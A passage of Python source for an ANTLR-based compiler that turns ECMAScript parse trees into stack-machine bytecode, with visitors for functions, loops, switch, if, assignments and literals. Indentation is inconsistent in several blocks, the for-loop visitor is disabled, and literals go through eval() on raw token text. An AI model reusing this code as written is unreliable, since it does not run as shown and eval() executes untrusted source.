and isinstance(ctx.children[3], antlr4.tree.Tree.TerminalNodeImpl)):
# haz no parameters
if ctx.getChildCount() == 7:
# Normal function, so we have a name
self.add_instruction(OpCode.PUSH, []) # add an empty param
program = Code()
bytecode = BytecodeVisitor(program)
ctx.children[5].accept(bytecode) # save the bytecode of the body in the var bytecode
self.add_instruction(OpCode.PUSH, program)
self.add_instruction(OpCode.MAKE_FUNC)
functionName = ctx.children[1].accept(self)
elif ctx.getChildCount() == 6:
# Lambda function, return function only
# setup the function bits
isLambda = True
self.add_instruction(OpCode.PUSH, []) # add an empty param
program = Code()
bytecode = BytecodeVisitor(program)
ctx.children[4].accept(bytecode) # save the bytecode of the body in the var bytecode
self.add_instruction(OpCode.PUSH, program)
self.add_instruction(OpCode.MAKE_FUNC)
else: # haz parameters
if ctx.getChildCount() == 8:
# Normal function, so we have a name
ctx.children[3].accept(self) #add params to stack
program = Code()
bytecode = BytecodeVisitor(program)
ctx.children[6].accept(bytecode) # save the bytecode of the body in the var bytecode
self.add_instruction(OpCode.PUSH, program)
self.add_instruction(OpCode.MAKE_FUNC)
functionName = ctx.children[1].accept(self)
elif ctx.getChildCount() == 7:
# Lambda function, return function only
# setup the function bits
isLambda = True
ctx.children[2].accept(self) #add params to stack
program = Code()
bytecode = BytecodeVisitor(program)
ctx.children[5].accept(bytecode) # save the bytecode of the body in the var bytecode
self.add_instruction(OpCode.PUSH, program)
self.add_instruction(OpCode.MAKE_FUNC)
if not isLambda:
self.add_instruction(OpCode.STORE, functionName)
    # Visit a parse tree produced by ECMAScriptParser#defaultClause.
    def visitDefaultClause(self, ctx):
        # Not reached in practice: visitCaseBlock handles the default clause
        # inline; a direct visit is unsupported.
        raise Utils.UnimplementedVisitorException(ctx)
    # Visit a parse tree produced by ECMAScriptParser#ForStatement.
    def visitForStatement(self, ctx):
        """Compile a for(;;) loop.

        Currently DISABLED: the early return below skips code generation
        entirely (known broken after the while-loop fix).
        """
        dprint("visitForStatement")
        print("For statement is broken due to while fix, U said only to fix while");
        return;
        # [0] = for, [1] = (, [2] = assignment/starting value, [3] = ;,
        # [4] = end condition, [5] = ; , [6] = change of var or whatever
        # [7] = ), [8] = block
        # The above is if the for loop is full, it could be for (;;) {...}
        # as well, so the code below is made to make sure it works no matter what
        #var for checking if the for statement has an condition or not
        noCondition = False
        assignmentIndex = 2
        # find assignment, if it exists
        # if we have for(;;) for example this will simply not do anything
        assignment = ctx.children[assignmentIndex].accept(self)
        if assignment == "var":
            assignmentIndex = assignmentIndex + 1 # = 3
            assignment = ctx.children[assignmentIndex].accept(self)
            conditionIndex = assignmentIndex + 2 # = 5
        elif assignment == ";":
            conditionIndex = assignmentIndex + 1; # = 3
        else:
            conditionIndex = assignmentIndex + 2; # = 4
        #find condition, if it exists
        if isinstance(ctx.children[conditionIndex], antlr4.tree.Tree.TerminalNodeImpl): #basically if = ;
            noCondition = True #no condition was supplied, so we should always return True
            incrementThingIndex = conditionIndex + 1
        else:
            #find increment thing, if it exists
            incrementThingIndex = conditionIndex + 2
        #find body
        if isinstance(ctx.children[incrementThingIndex], antlr4.tree.Tree.TerminalNodeImpl):
            bodyIndex = incrementThingIndex + 1
        else:
            bodyIndex = incrementThingIndex + 2
        placeholderAddr = 1337
        breakAddr = self.program.current_index()
        self.add_instruction(OpCode.TRY_PUSH, placeholderAddr)
        continueStart = self.program.current_index()
        self.add_instruction(OpCode.TRY_PUSH, continueStart)
        forStart = self.program.current_index()
        if noCondition:
            self.add_instruction(OpCode.PUSH, True)
        else:
            ctx.children[conditionIndex].accept(self) # True/False value pushed to stack
        unlessJmpAddr = self.program.current_index()
        self.add_instruction(OpCode.UNLESSJMP, placeholderAddr)
        # code to run
        ctx.children[bodyIndex].accept(self)
        # Jump over try_push, try_push should only be reached from throw(continue)
        self.add_instruction(OpCode.JMP, self.program.current_index()+2)
        continueAddr = self.program.current_index()
        self.add_instruction(OpCode.TRY_PUSH, continueAddr)
        ctx.children[incrementThingIndex].accept(self)
        #ctx.children[6].accept(self) # run the increment of var or whatever
        self.add_instruction(OpCode.JMP, forStart)
        exitForAddr = self.program.current_index()
        self.program.modify_instruction_arg(unlessJmpAddr, exitForAddr)
        self.program.modify_instruction_arg(breakAddr, exitForAddr)
        self.program.modify_instruction_arg(continueStart, continueAddr)
# Visit a parse tree produced by ECMAScriptParser#caseBlock.
def visitCaseBlock(self, ctx):
dprint("visitCaseBlock")
# Should have placeholder that is replaced with address out of switch/case(to jump out)
placeholderAddr = 1337
defalutAddr = None
breakAddr = self.program.current_index()
self.add_instruction(OpCode.TRY_PUSH, placeholderAddr)
self.add_instruction(OpCode.TRY_PUSH, placeholderAddr) # dummy try_push beacuse break does pop first
#push placeholder jump-table
jumpTableAddr = self.program.current_index()
jumpTable = {}
self.add_instruction(OpCode.PUSH, {})
switchAddr = self.program.current_index()
self.add_instruction(OpCode.SWITCH, placeholderAddr)
for child in ctx.children:
if(not isinstance(child, antlr4.tree.Tree.TerminalNodeImpl)): # Skip "{ and }"
#VARNING, fulhack incoming
if(isinstance(child.children[1], antlr4.tree.Tree.TerminalNodeImpl)):
caseVal = child.children[1].symbol.text
else:
caseVal = child.children[1].children[0].children[0].children[0].children[0].symbol.text
if caseVal == ":": #Default
#There is a default case, save it in case we need it
defalutAddr = self.program.current_index()
child.children[2].accept(self)
else:
caseVal = int(caseVal) # Nothing to see, move on
#Add to jump table
jmpAddr = self.program.current_index()
jumpTable[caseVal] = jmpAddr
#code to run here
child.children[3].accept(self)
self.add_instruction(OpCode.TRY_POP)
self.add_instruction(OpCode.TRY_POP)
### Fix placeholder stuff (jump table, try_push)
self.program.modify_instruction_arg(jumpTableAddr, jumpTable)
exitSwitchAddr = self.program.current_index()
self.program.modify_instruction_arg(breakAddr, exitSwitchAddr)
if defalutAddr is None:
defalutAddr = exitSwitchAddr
self.program.modify_instruction_arg(switchAddr,defalutAddr)
    # Visit a parse tree produced by ECMAScriptParser#objectLiteral.
    def visitObjectLiteral(self, ctx):
        """Compile an object literal: each property pushes itself, then MAKE_OBJECT."""
        dprint("visitObjectLiteral")
        printCtx(ctx)
        i = 0
        for child in ctx.children:
            # Terminals are '{', ',' and '}'; only property assignments count.
            if not isinstance(child, antlr4.tree.Tree.TerminalNodeImpl):
                child.accept(self)
                i = i + 1
        self.add_instruction(OpCode.MAKE_OBJECT, i)
    # Visit a parse tree produced by ECMAScriptParser#throwStatement.
    def visitThrowStatement(self, ctx):
        """Compile 'throw "msg"': push the literal text (quotes stripped), then THROW.

        NOTE(review): only a plain string-literal operand is supported -- the
        message is dug out of a fixed subtree position.
        """
        dprint("visitThrowStatement")
        message = ctx.children[1].children[0].children[0].children[0].symbol.text
        # Strip the surrounding quote characters.
        message = message[1:-1]
        self.add_instruction(OpCode.PUSH, message)
        self.add_instruction(OpCode.THROW)
# Visit a parse tree produced by ECMAScriptParser#breakStatement.
def visitBreakStatement(self, ctx):
    """Compile `break`: emit a JMP with a dummy target (6000).

    The instruction's index is pushed onto tmpStack so the enclosing
    loop/switch can patch in the real exit address later (see the
    switch visitor's modify_instruction_arg call).
    """
    dprint("visitBreakStatement")
    tmpAddr = 6000
    self.tmpStack.push(self.program.current_index())
    self.add_instruction(OpCode.JMP, tmpAddr)
    #self.add_instruction(OpCode.TRY_POP)
    #self.add_instruction(OpCode.THROW)
# Visit a parse tree produced by ECMAScriptParser#ifStatement.
def visitIfStatement(self, ctx):
    """Compile if/else with placeholder jumps patched after the fact.

    Emits: <cond> UNLESSJMP afterIF <then> [JMP afterELSE] ... <else>.
    The placeholder value 1337 is replaced once the target address is known.
    """
    dprint("visitIfStatement")
    ctx.children[2].accept(self)  # True/False value pushed to stack
    placeHolderIFPosition = self.program.current_index()
    self.add_instruction(OpCode.UNLESSJMP, 1337)  # 1337 = placeholder target
    ctx.children[4].accept(self)  # then-branch
    # if we have an else statement we need to jump over it
    if ctx.getChildCount() >= 7:
        placeHolderELSEPosition = self.program.current_index()
        self.add_instruction(OpCode.JMP, 1337)
    # make sure the UNLESSJMP jumps over the if-true part of the statement
    afterIF = self.program.current_index()
    self.program.modify_instruction_arg(placeHolderIFPosition, afterIF)
    if (ctx.getChildCount() >= 7):
        ctx.children[6].accept(self)  # else-branch
        # change the jump in the if-statement to jump over the else part
        afterELSE = self.program.current_index()
        self.program.modify_instruction_arg(placeHolderELSEPosition, afterELSE)
# Visit a parse tree produced by ECMAScriptParser#variableDeclaration.
def visitVariableDeclaration(self, ctx):
    """Compile a variable declaration; with an initialiser, evaluate and store it."""
    dprint("visitVariableDeclaration")
    varname = ctx.children[0].accept(self)
    if ctx.getChildCount() == 1:
        # bare `var x;` — just declare
        self.add_instruction(OpCode.DCL, varname)
        return
    # `var x = expr;` — evaluate the initialiser, then store
    ctx.children[1].accept(self)
    self.add_instruction(OpCode.STORE, varname)
# Visit a parse tree produced by ECMAScriptParser#catchProduction.
def visitCatchProduction(self, ctx):
    """Compile `catch (err) { ... }`: store the thrown value, run the handler."""
    dprint("visitCatchProduction")
    err = ctx.children[2].accept(self)  # the exception variable's name
    #print("error variable is: ", err)
    self.add_instruction(OpCode.STORE, err)  # thrown value is on top of the stack
    ctx.children[4].accept(self)  # the handler body
# Visit a parse tree produced by ECMAScriptParser#continueStatement.
def visitContinueStatement(self, ctx):
    """Compile `continue`: emit a JMP with a dummy target (7000).

    Like `break`, the jump's index goes onto tmpStack so the enclosing
    loop can patch in the real continue address.
    """
    dprint("visitContinueStatement")
    tmpAddr = 7000
    self.tmpStack.push(self.program.current_index())
    self.add_instruction(OpCode.JMP, tmpAddr)
    # self.add_instruction(OpCode.THROW)
# Visit a parse tree produced by ECMAScriptParser#caseClause.
def visitCaseClause(self, ctx):
    """Unused: case clauses appear to be handled inline by the switch visitor."""
    raise Utils.UnimplementedVisitorException(ctx)
def gen_setter(self, a, idx, b):
dprint("gen_setter, 3 args")
if(isinstance(a, list)):
a[int(idx)] = b
else:
if(isinstance(idx, float)):
idx = "__float__" + str(idx)
if(isinstance(b, Function)):
b = (a, b)
if(hasattr(a, idx)):
val = getattr(a, idx)
if(isinstance(val, Property)):
val.set(b)
else:
setattr(a, idx, b)
else:
setattr(a, idx, b)
def gen_getter(self, a, idx):
dprint("gen_getter, 2 args")
if(isinstance(a, list)):
if(idx == 'length'):
return float(len(a))
elif(idx == 'append'):
return lambda this, value: a.append(value)
return a[int(idx)]
else:
if(isinstance(idx, float)):
idx = "__float__" + str(idx)
val = getattr(a, idx)
if(isinstance(val, Property)):
return val.get()
else:
return val
def gen_setter_dot(self, a, idx):
    """Emit code that stores the top of stack into member *idx* of expression *a*."""
    dprint("gen_setter_dot")  # fixed debug-message typo: was "gen_stter_dot"
    a.accept(self)
    self.add_instruction(OpCode.STORE_MEMBER, idx)
def gen_getter_dot(self, a, idx):
    """Emit code that loads member *idx* of object expression *a*."""
    dprint("gen_getter_dot")
    a.accept(self)
    self.add_instruction(OpCode.LOAD_MEMBER, idx)
def gen_setter_indice(self, a, idx):
    """Emit code that stores the top of stack into a[idx] (computed index)."""
    dprint("gen_setter_indice")
    a.accept(self)
    idx.accept(self)
    self.add_instruction(OpCode.STORE_INDEX)
def gen_getter_indice(self, a, idx):
    """Emit code that loads a[idx] (computed index)."""
    dprint("gen_getter_indice")
    a.accept(self)
    idx.accept(self)
    self.add_instruction(OpCode.LOAD_INDEX)
def assignmentVariable(self, array, index, typ):
    """Build (setter, getter) emitter thunks for an assignment target.

    *array*/*index* locate the target nodes among the parse-tree children;
    *typ* selects plain identifier, dotted member, or indexed access.
    The lambdas close over array/index and emit code only when invoked,
    so callers control where in the instruction stream the access lands.
    """
    dprint("assignmentVariable")
    if(typ == self.AV_IDENTIFIER):
        variable_setter = lambda: self.add_instruction(OpCode.STORE, array[index].symbol.text)
        variable_getter = lambda: self.add_instruction(OpCode.LOAD, array[index].symbol.text)
    elif(typ == self.AV_MEMBERDOT):
        # the member-name node sits two children after the object expression
        variable_setter = lambda: self.gen_setter_dot(array[index], array[index + 2].accept(self))
        variable_getter = lambda: self.gen_getter_dot(array[index], array[index + 2].accept(self))
    elif(typ == self.AV_INDICE):
        variable_setter = lambda: self.gen_setter_indice(array[index], array[index + 2])
        variable_getter = lambda: self.gen_getter_indice(array[index], array[index + 2])
    else:
        raise Utils.UnimplementedVisitorException(array)
    return (variable_setter, variable_getter)
# Visit a parse tree produced by ECMAScriptParser#PropertyExpressionAssignment.
def visitPropertyExpressionAssignment(self, ctx):
    """Compile `name: value` inside an object literal: value first, then name."""
    dprint("visitPropertyExpressionAssignment")
    ctx.children[2].accept(self)  # the property value
    name = ctx.children[0].accept(self)  # could be anything, but get and set are special
    if(name != None):
        self.add_instruction(OpCode.PUSH, name)
# Visit a parse tree produced by ECMAScriptParser#assignmentOperator.
def visitAssignmentOperator(self, ctx):
    """Return the assignment operator's source text (e.g. '=', '+=')."""
    dprint("visitAssignmentOperator")
    return ctx.children[0].symbol.text
# Visit a parse tree produced by ECMAScriptParser#eos.
def visitEos(self, ctx):
    """End-of-statement marker: nothing to emit."""
    dprint("visitEos")
    pass
# Visit a parse tree produced by ECMAScriptParser#program.
def visitProgram(self, ctx):
    """Visit every non-terminal child of the program and collect the results."""
    dprint("visitProgram")
    return [node.accept(self)
            for node in ctx.children
            if not isinstance(node, antlr4.tree.Tree.TerminalNodeImpl)]
# Visit a parse tree produced by ECMAScriptParser#argumentList.
def visitArgumentList(self, ctx):
    """Push each call argument (in reverse source order) and return the count.

    NOTE(review): the in-line comment below suggests the ordering has been
    flip-flopped before; confirm against the VM's CALL convention.
    """
    dprint("visitArgumentList")
    count = 0
    for c in reversed(ctx.children):  # we did reversed() here before to fix things, but it broke more things
        if(not isinstance(c, antlr4.tree.Tree.TerminalNodeImpl)):  # Skip ","
            c.accept(self)
            count += 1
    return count
# Visit a parse tree produced by ECMAScriptParser#ThisExpression.
def visitThisExpression(self, ctx):
    """Compile `this`: load the current receiver onto the stack."""
    dprint("visitThisExpression")
    self.add_instruction(OpCode.LOAD, "this")
# Visit a parse tree produced by ECMAScriptParser#identifierName.
def visitIdentifierName(self, ctx):
    """Return the identifier's text by delegating to its child token."""
    dprint("visitIdentifierName")
    return ctx.children[0].accept(self)
# Visit a parse tree produced by ECMAScriptParser#BinaryExpression.
def visitBinaryExpression(self, ctx):
    """Compile a binary expression.

    '&&' and '||' get short-circuit jump sequences; every other operator
    evaluates both operands and emits a single opcode (via a dispatch
    table — the original if/elif ladder, deduplicated '+' check, and
    stray semicolons are cleaned up; emission order is unchanged).

    NOTE(review): for '+' the operands are pushed right-then-left, the
    reverse of all other operators — presumably to match the VM's ADD
    operand order; confirm against the interpreter.
    """
    dprint("visitBinaryExpression")
    op = ctx.children[1].accept(self)
    if op == '&&':
        placeholderAddr = 1337
        ctx.children[0].accept(self)
        if1 = self.program.current_index()
        self.add_instruction(OpCode.UNLESSJMP, placeholderAddr)  # left false -> push False
        ctx.children[2].accept(self)
        if2 = self.program.current_index()
        self.add_instruction(OpCode.JMP, placeholderAddr + 1)  # result is the right operand
        jump1 = self.program.current_index()
        self.add_instruction(OpCode.PUSH, False)
        self.program.modify_instruction_arg(if1, jump1)
        self.program.modify_instruction_arg(if2, jump1 + 1)
        return
    if op == '||':
        placeholderAddr = 1337
        ctx.children[0].accept(self)
        if1 = self.program.current_index()
        self.add_instruction(OpCode.IFJMP, placeholderAddr)  # left true -> push True
        ctx.children[2].accept(self)
        if2 = self.program.current_index()
        self.add_instruction(OpCode.JMP, placeholderAddr + 1)  # result is the right operand
        jump1 = self.program.current_index()
        self.add_instruction(OpCode.PUSH, True)
        self.program.modify_instruction_arg(if1, jump1)
        self.program.modify_instruction_arg(if2, jump1 + 1)
        return
    if op == '+':
        # '+' pushes operands in reverse order (see NOTE above)
        ctx.children[2].accept(self)
        ctx.children[0].accept(self)
    else:
        ctx.children[0].accept(self)
        ctx.children[2].accept(self)
    opcode_by_op = {
        '+': OpCode.ADD, '-': OpCode.SUB, '*': OpCode.MUL, '/': OpCode.DIV,
        '%': OpCode.MOD,
        '<<': OpCode.LEFT_SHIFT, '>>': OpCode.RIGHT_SHIFT,
        '>>>': OpCode.UNSIGNED_RIGHT_SHIFT,
        '>': OpCode.SUPPERIOR, '>=': OpCode.SUPPERIOR_EQUAL,
        '<': OpCode.INFERIOR, '<=': OpCode.INFERIOR_EQUAL,
        '==': OpCode.EQUAL, '===': OpCode.EQUAL,      # strict == loose here
        '!=': OpCode.DIFFERENT, '!==': OpCode.DIFFERENT,
        '&': OpCode.AND, '|': OpCode.OR,
    }
    if op not in opcode_by_op:
        raise Utils.UnknownOperator(op)
    self.add_instruction(opcode_by_op[op])
# Visit a parse tree produced by ECMAScriptParser#futureReservedWord.
def visitFutureReservedWord(self, ctx):
    """Future reserved words are not supported by this compiler."""
    raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#initialiser.
def visitInitialiser(self, ctx):
    """Compile `= expression`: emit code for the right-hand side."""
    dprint("visitInitialiser")
    ctx.children[1].accept(self)
# Visit a parse tree produced by ECMAScriptParser#statementList.
def visitStatementList(self, ctx):
    """Compile every statement in the list."""
    dprint("visitStatementList")
    self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#PropertyGetter.
def visitPropertyGetter(self, ctx):
    """Compile `get name() { body }` inside an object literal.

    The body is compiled into its own Code object with a fresh visitor,
    wrapped into a zero-argument function, and attached as a getter.
    NOTE(review): ctx.children[1].accept(self) is evaluated three times
    below; if visiting the name node ever emits instructions, they would
    be emitted three times — confirm the name visit is side-effect free.
    """
    dprint("visitPropertyGetter")
    printCtx(ctx)
    func_code = Code()
    bv = BytecodeVisitor(func_code)
    ctx.children[5].accept(bv)  # compile the getter body into func_code
    tmp = ObjectModule()
    self.add_instruction(OpCode.PUSH, tmp)
    self.add_instruction(OpCode.PUSH, [])  # getters take no parameters
    self.add_instruction(OpCode.PUSH, func_code)
    self.add_instruction(OpCode.MAKE_FUNC)
    self.add_instruction(OpCode.PUSH, ctx.children[1].accept(self))
    self.add_instruction(OpCode.MAKE_GETTER)
    self.add_instruction(OpCode.LOAD_MEMBER, ctx.children[1].accept(self), True)  # extract the getter
    self.add_instruction(OpCode.PUSH, ctx.children[1].accept(self))  # name again
# Visit a parse tree produced by ECMAScriptParser#block.
def visitBlock(self, ctx):
    """Compile `{ ... }` by visiting the contained statements."""
    dprint("visitBlock")
    self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#expressionStatement.
def visitExpressionStatement(self, ctx):
    """Compile an expression statement and POP its unused result."""
    dprint("visitExpressionStatement")
    self.visitChildren(ctx)
    self.add_instruction(OpCode.POP, 1)
# Visit a parse tree produced by ECMAScriptParser#keyword.
def visitKeyword(self, ctx):
    """Bare keywords are not handled by this compiler."""
    raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#numericLiteral.
def visitNumericLiteral(self, ctx):
    """Push a numeric literal, normalised to float.

    The value is computed once instead of the original double eval().
    NOTE(review): eval() parses any numeric token form (hex, exponent, …)
    but executes source text — assumes trusted input.
    """
    value = float(eval(ctx.children[0].symbol.text))
    dprint("visitNumericLiteral " + str(value))
    self.add_instruction(OpCode.PUSH, value)
# Visit a parse tree produced by ECMAScriptParser#labelledStatement.
def visitLabelledStatement(self, ctx):
    """Labelled statements are not supported by this compiler."""
    raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#PropertySetter.
def visitPropertySetter(self, ctx):
    """Compile `set name(param) { body }` inside an object literal.

    Mirrors visitPropertyGetter, but the function takes a single
    parameter (children[3]).  The same caveat applies: children[1] is
    visited three times to obtain the property name.
    """
    dprint("visitPropertySetter")
    func_code = Code()
    bv = BytecodeVisitor(func_code)
    ctx.children[6].accept(bv)  # compile the setter body into func_code
    tmp = ObjectModule()
    self.add_instruction(OpCode.PUSH, tmp)
    self.add_instruction(OpCode.PUSH, [ctx.children[3].accept(self)])  # the parameter name
    self.add_instruction(OpCode.PUSH, func_code)
    self.add_instruction(OpCode.MAKE_FUNC)
    self.add_instruction(OpCode.PUSH, ctx.children[1].accept(self))  # push name
    self.add_instruction(OpCode.MAKE_SETTER)
    self.add_instruction(OpCode.LOAD_MEMBER, ctx.children[1].accept(self), True)  # extract the setter
    self.add_instruction(OpCode.PUSH, ctx.children[1].accept(self))  # name again
# Visit a parse tree produced by ECMAScriptParser#LiteralExpression.
def visitLiteralExpression(self, ctx):
    """Compile a literal expression by delegating to the literal node."""
    dprint("visitLiteralExpression")
    self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#ArrayLiteralExpression.
def visitArrayLiteralExpression(self, ctx):
    """Compile an array literal expression; returns the child's result."""
    dprint("visitArrayLiteralExpression")
    return ctx.children[0].accept(self)
# Visit a parse tree produced by ECMAScriptParser#withStatement.
def visitWithStatement(self, ctx):
    """`with` statements are not supported by this compiler."""
    raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#MemberIndexExpression.
def visitMemberIndexExpression(self, ctx):
    """Compile `a[expr]`: push the object, push the index, emit LOAD_INDEX."""
    # Should return a[1], a value from array
    # a [ list ]
    dprint("visitMemberIndexExpression")
    ctx.children[0].accept(self)  # get name and load it
    ctx.children[2].accept(self)  # put index on stack
    dprint("visitMemberIndexExpression-still")
    self.add_instruction(OpCode.LOAD_INDEX)
# Visit a parse tree produced by ECMAScriptParser#formalParameterList.
def visitFormalParameterList(self, ctx):
    """Collect parameter names (reversed to match the call convention) and push them."""
    dprint("visitFormalParameterList")
    # NOTE: originally filtered by token type (Identifier); now filters out ','
    args = [node.symbol.text
            for node in reversed(ctx.children)
            if node.symbol.text != ","]
    self.add_instruction(OpCode.PUSH, args)
# Visit a parse tree produced by ECMAScriptParser#incrementOperator.
def visitIncrementOperator(self, ctx):
    """Return the increment operator's text ('++' or '--')."""
    dprint("visitIncrementOperator")
    return ctx.children[0].symbol.text
# Visit a parse tree produced by ECMAScriptParser#AssignmentOperatorExpression.
def visitAssignmentOperatorExpression(self, ctx):
    """Compile `target op= value` for '=', '+=', '-=', '*=', '/='.

    The child count gives the target shape: 3 = identifier, 5 = dotted
    member, 6 = indexed.  The value is evaluated first; compound forms
    then load the old value on top of it.  SWAP is emitted for '-=' and
    '/=' because those operators are non-commutative and the operands
    arrive in reverse order.
    """
    dprint("visitAssignmentOperatorExpression")
    if(len(ctx.children) == 3):
        (variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_IDENTIFIER)
        operator = ctx.children[1]
        value = ctx.children[2]
    elif(len(ctx.children) == 5):
        (variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_MEMBERDOT)
        operator = ctx.children[3]
        value = ctx.children[4]
    elif(len(ctx.children) == 6):
        (variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_INDICE)
        operator = ctx.children[4]
        value = ctx.children[5]
    else:
        raise Utils.UnimplementedVisitorException(ctx)
    operator = operator.accept(self)
    value.accept(self)
    if(operator == "="):
        variable_setter()
    elif(operator == "+="):
        variable_getter()
        self.add_instruction(OpCode.ADD)
        variable_setter()
    elif(operator == "-="):
        variable_getter()
        self.add_instruction(OpCode.SWAP)  # non-commutative: fix operand order
        self.add_instruction(OpCode.SUB)
        variable_setter()
    elif(operator == "*="):
        variable_getter()
        self.add_instruction(OpCode.MUL)
        variable_setter()
    elif(operator == "/="):
        variable_getter()
        self.add_instruction(OpCode.SWAP)  # non-commutative: fix operand order
        self.add_instruction(OpCode.DIV)
        variable_setter()
    else:
        raise Utils.UnknownOperator(operator)
# Visit a parse tree produced by ECMAScriptParser#PostUnaryAssignmentExpression.
def visitPostUnaryAssignmentExpression(self, ctx):
    """Compile postfix `target++` / `target--`.

    The old value is DUPed (presumably so it remains the expression's
    result), the adjusted copy is stored back, then POP 1 clears
    leftover stack state — NOTE(review): confirm against the VM's
    STORE semantics.
    """
    dprint("visitPostUnaryAssignmentExpression")
    if(len(ctx.children) == 2):
        (variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_IDENTIFIER)
        operator = ctx.children[1]
    elif(len(ctx.children) == 4):
        (variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_MEMBERDOT)
        operator = ctx.children[3]
    elif(len(ctx.children) == 5):
        (variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_INDICE)
        operator = ctx.children[4]
    else:
        raise Utils.UnimplementedVisitorException(ctx)
    operator = operator.accept(self)
    variable_getter()
    self.add_instruction(OpCode.DUP)
    self.add_instruction(OpCode.PUSH, 1)
    if(operator == "++"):
        self.add_instruction(OpCode.ADD)
    elif(operator == "--"):
        self.add_instruction(OpCode.SUB)
    else:
        raise Utils.UnimplementedVisitorException(ctx)
    variable_setter()
    self.add_instruction(OpCode.POP, 1)
# Visit a parse tree produced by ECMAScriptParser#TernaryExpression.
def visitTernaryExpression(self, ctx):
    """The ternary `?:` operator is not supported by this compiler."""
    raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#debuggerStatement.
def visitDebuggerStatement(self, ctx):
    """`debugger` statements are not supported by this compiler."""
    raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#ObjectLiteralExpression.
def visitObjectLiteralExpression(self, ctx):
    """Compile an object literal expression by delegating to the literal node."""
    dprint("visitObjectLiteralExpression")
    ctx.children[0].accept(self)
# Visit a parse tree produced by ECMAScriptParser#arrayLiteral.
def visitArrayLiteral(self, ctx):
    """Compile `[ elements ]` by visiting the element list (children[1])."""
    dprint("visitArrayLiteral")
    ctx.children[1].accept(self)
# Visit a parse tree produced by ECMAScriptParser#elision.
def visitElision(self, ctx):
    """Array elisions (holes) are not supported by this compiler."""
    raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#statements.
def visitStatements(self, ctx):
    """Compile a run of statements."""
    dprint("visitStatements")
    self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#UnaryExpression.
def visitUnaryExpression(self, ctx):
    """Compile a prefix unary operator applied to children[1]."""
    dprint("visitUnaryExpression")
    op = ctx.children[0].symbol.text
    ctx.children[1].accept(self)
    if op == '+':
        return  # unary plus is a no-op
    unary_opcodes = {'-': OpCode.NEG, '~': OpCode.TILDE, '!': OpCode.NOT}
    if op not in unary_opcodes:
        raise Utils.UnknownOperator(op)
    self.add_instruction(unary_opcodes[op])
# Visit a parse tree produced by ECMAScriptParser#expressionSequence.
def visitExpressionSequence(self, ctx):
    """Compile a comma-separated expression sequence."""
    dprint("visitExpressionSequence")
    return self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#literal.
def visitLiteral(self, ctx):
    """Push a literal value.

    true/false are special-cased; other terminal tokens are parsed with
    eval() (strings, numbers); non-terminal children are delegated.
    """
    dprint("visitLiteral")
    child = ctx.children[0]
    if(isinstance(child, antlr4.tree.Tree.TerminalNodeImpl)):
        if(child.symbol.text == 'true'):
            self.add_instruction(OpCode.PUSH, True)
        elif(child.symbol.text == 'false'):
            self.add_instruction(OpCode.PUSH, False)
        else:
            # NOTE(review): eval() on the raw token assumes trusted source text
            self.add_instruction(OpCode.PUSH, eval(child.symbol.text))
    else:
        child.accept(self)
# Visit a parse tree produced by ECMAScriptParser#variableStatement.
def visitVariableStatement(self, ctx):
    """Compile `var ...;` by visiting the declaration list."""
    dprint("visitVariableStatement")
    self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#statement.
def visitStatement(self, ctx):
    """Compile a generic statement by delegating to its concrete child."""
    dprint("visitStatement")
    self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#ParenthesizedExpression.
def visitParenthesizedExpression(self, ctx):
    """Compile `( expr )` by visiting the inner expression."""
    dprint("visitParenthesizedExpression")
    ctx.children[1].accept(self)
# Visit a parse tree produced by ECMAScriptParser#reservedWord.
def visitReservedWord(self, ctx):
    """Reserved words are not supported by this compiler."""
    raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#finallyProduction.
def visitFinallyProduction(self, ctx):
    """Compile `finally { ... }` by visiting its block."""
    dprint("visitFinallyProduction")
    ctx.children[1].accept(self)
# Visit a parse tree produced by ECMAScriptParser#IdentifierExpression.
def visitIdentifierExpression(self, ctx):
    """Compile an identifier reference: load its value onto the stack."""
    dprint("visitIdentifierExpression")
    self.add_instruction(OpCode.LOAD, ctx.children[0].accept(self))
# Visit a parse tree produced by ECMAScriptParser#propertyName.
def visitPropertyName(self, ctx):
    """Push a property name; string-literal names are unquoted via eval().

    NOTE(review): the original comment flagged that some elements here
    should perhaps be ObjectModule instances rather than plain str — verify.
    """
    dprint("visitPropertyName")
    child = ctx.children[0]
    if(isinstance(child, antlr4.tree.Tree.TerminalNodeImpl)):
        if(child.symbol.type == ECMAScriptParser.Lexer.StringLiteral):
            self.add_instruction(OpCode.PUSH, eval(child.symbol.text))
            return
    r = child.accept(self)
    if(r != None):
        self.add_instruction(OpCode.PUSH, r)
# Visit a parse tree produced by ECMAScriptParser#arguments.
def visitArguments(self, ctx):
    """Compile a call's argument list and return how many arguments were pushed."""
    dprint("visitArguments")
    child_count = len(ctx.children)
    if child_count == 3:  # '(' argumentList ')'
        return ctx.children[1].accept(self)
    if child_count == 2:  # '(' ')'
        return 0
    raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#variableDeclarationList.
def visitVariableDeclarationList(self, ctx):
    """Compile each declaration in `var a = 1, b = 2, ...`."""
    dprint("visitVariableDeclarationList")
    self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#functionBody.
